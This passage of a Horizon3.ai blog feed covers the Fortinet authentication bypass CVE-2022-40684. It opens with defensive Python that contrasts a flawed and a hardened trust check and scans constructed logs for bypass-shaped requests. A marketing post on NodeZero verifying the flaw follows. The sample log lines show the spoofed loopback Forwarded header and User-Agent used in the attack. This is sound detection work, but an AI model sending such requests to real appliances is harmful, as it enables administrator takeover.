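def flawed_trust_check(peer_ip: str, headers: Dict[str, str]) -> bool:
    """Reconstruction of the vulnerable logic: client_ip is overwritten from
    the Forwarded header and User-Agent acts as an authentication factor, so
    both inputs are chosen by whoever sends the request."""
    client_ip = forwarded_for(headers) or peer_ip
    return client_ip == LOOPBACK and headers.get("User-Agent") in PRIVILEGED_AGENTS


def hardened_trust_check(peer_ip: str, headers: Dict[str, str],
                         trusted_proxies: frozenset = frozenset()) -> bool:
    """Hardened variant (this example's design): the client address is the
    TCP peer; Forwarded is honoured only when that peer is an allowlisted
    proxy; User-Agent plays no part in the decision."""
    client_ip = peer_ip
    if peer_ip in trusted_proxies:
        client_ip = forwarded_for(headers) or peer_ip
    return client_ip == LOOPBACK


# Constructed log format for the demo: one request per line.
LOG_LINE = re.compile(
    r'peer=(?P<peer>\S+) (?P<method>\S+) (?P<path>\S+) ua="(?P<ua>[^"]*)"'
    r"(?: forwarded='(?P<fwd>[^']*)')?$")


def find_bypass_shaped_requests(log_lines: List[str]) -> List[str]:
    """Flag lines where a non-loopback peer sent a request the flawed check
    would have trusted: a spoofed loopback address plus a privileged agent."""
    hits = []
    for line in log_lines:
        m = LOG_LINE.search(line)
        if not m:
            continue
        headers = {"User-Agent": m["ua"]}
        if m["fwd"]:
            headers["Forwarded"] = m["fwd"]
        if m["peer"] != LOOPBACK and flawed_trust_check(m["peer"], headers):
            hits.append(line)
    return hits


SAMPLE_LOG = [  # constructed; 203.0.113.0/24 and 198.51.100.0/24 are documentation ranges
    "peer=203.0.113.5 PUT /api/v2/cmdb/system/admin/admin ua=\"Report Runner\" "
    "forwarded='for=\"[127.0.0.1]:8000\";by=\"[127.0.0.1]:9000\";'",
    "peer=127.0.0.1 GET /api/v2/cmdb/system/status ua=\"Node.js\" "
    "forwarded='for=\"[127.0.0.1]:8000\"'",             # genuine local proxy traffic
    "peer=198.51.100.7 GET /api/v2/monitor/system/status ua=\"Mozilla/5.0\"",
    "peer=198.51.100.7 GET /api/v2/cmdb/system/admin ua=\"Node.js\" forwarded='for=127.0.0.1'",
    "peer=203.0.113.9 GET /login ua=\"Report Runner\"",  # privileged agent, no spoofed address
]


def demo() -> List[str]:
    """Run the detector over the constructed sample; returns the flagged lines."""
    return find_bypass_shaped_requests(SAMPLE_LOG)


if __name__ == "__main__":
    for line in demo():
        print("SUSPICIOUS:", line)
```

Two of the five constructed lines are flagged: the external peer presenting Forwarded for=[127.0.0.1] with "Report Runner", and the "Node.js" variant the summary mentions. The loopback peer is left alone because a local proxy legitimately forwards with those headers, and a privileged User-Agent on its own, without the spoofed address, is not enough to pass the flawed check. The hardened check returns False for the spoofed request from an outside peer no matter which User-Agent it carries, because nothing the client controls reaches the comparison.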

The post FortiOS, FortiProxy, and FortiSwitchManager Authentication Bypass Technical Deep Dive (CVE-2022-40684) appeared first on Horizon3.ai.

Secure Your Fortinet Appliances Across On-Prem, Cloud, and Hybrid Networks at Scale

18 October 2022 at 16:12

If there’s one thing we love seeing, it’s people using NodeZero to assess their hybrid cloud at scale, especially when verifying a fix.

While unannounced zero-day vulnerabilities garner a fair bit of fear and attention, one of the greatest risks introduced to business operations is newly announced vulnerabilities, or N-days. When an easily exploitable vulnerability surfaces for a ubiquitous product, we’re all in a race condition to:

  1. Find any assets (especially public-facing) that are vulnerable
  2. Fix (remediate or mitigate) as quickly and safely as possible
  3. Verify the implemented fix action is actually working when attacked

For example, over the last week cybersecurity practitioners have been scrambling to remediate their Fortinet appliances against the latest vulnerability, CVE-2022-40684. In case you missed it, here’s a rundown to catch you up:

A quick online search reveals several articles outlining the vulnerability and its ongoing mass exploitation. When an easily exploitable vulnerability surfaces for such a ubiquitous product, we’re all in a race condition to fix while attackers are trying to exploit.

In the image below, you will see part of an administrator’s NodeZero operations summary screen, where several of our customers and new free-trial users are quickly verifying their security posture.

Some wanted to focus on specific known hosts running the vulnerable OS, while others wanted to find, fix, and verify at scale across their entire enterprise network. This is how our users find the appliance that wasn’t supposed to be public-facing anymore, the host set up by marketing that was supposed to have been decommissioned years ago, or the place where the third-party authentications your developers used while the product was in staging didn’t promote to prod. This is how we all verify that our weekend fix actions are effective.

For instance, here’s how one client used NodeZero:

They used NodeZero to find and verify that their Fortinet appliance was vulnerable, reachable, and exploitable from their chosen perspective, or launch point. They didn’t need to install an agent, create a script, or load a credential. They just used our simple Course of Action card, specified a scope, and launched a pentest.

Their first test came back confirming their appliance was exploitable.

This is the attack path NodeZero took en route to compromising this host and critical infrastructure.

You can see that NodeZero autonomously discovered the host, checked that the web service on port 80 was up and running, found that the FortiGate SSL VPN application was running, and then ran our exploit, which takes advantage of the appliance OS treating a browser header and a specific server IP address as authoritative. It told the appliance to reach out to our interact server, and once the host was compromised, NodeZero provided proof by showing the contents of the administrator user settings.

Now that they knew it was exploitable, what did they do? 17 minutes later they ran a second attack, just to verify it really was. After confirming, the next pentest we see is the following morning:

And now you can see the comparison, where the hosts are still reachable but no longer vulnerable or exploitable.

This is how we win.

Bottom Line: we’re simplifying the ability for anyone to verify if their appliances are reachable, vulnerable, and exploitable. Can your other tools do that at speed and scale?

This article was authored by Monti Knode, Director of Customer and Partner Success at Horizon3.ai. 

The post Secure Your Fortinet Appliances Across On-Prem, Cloud, and Hybrid Networks at Scale appeared first on Horizon3.ai.
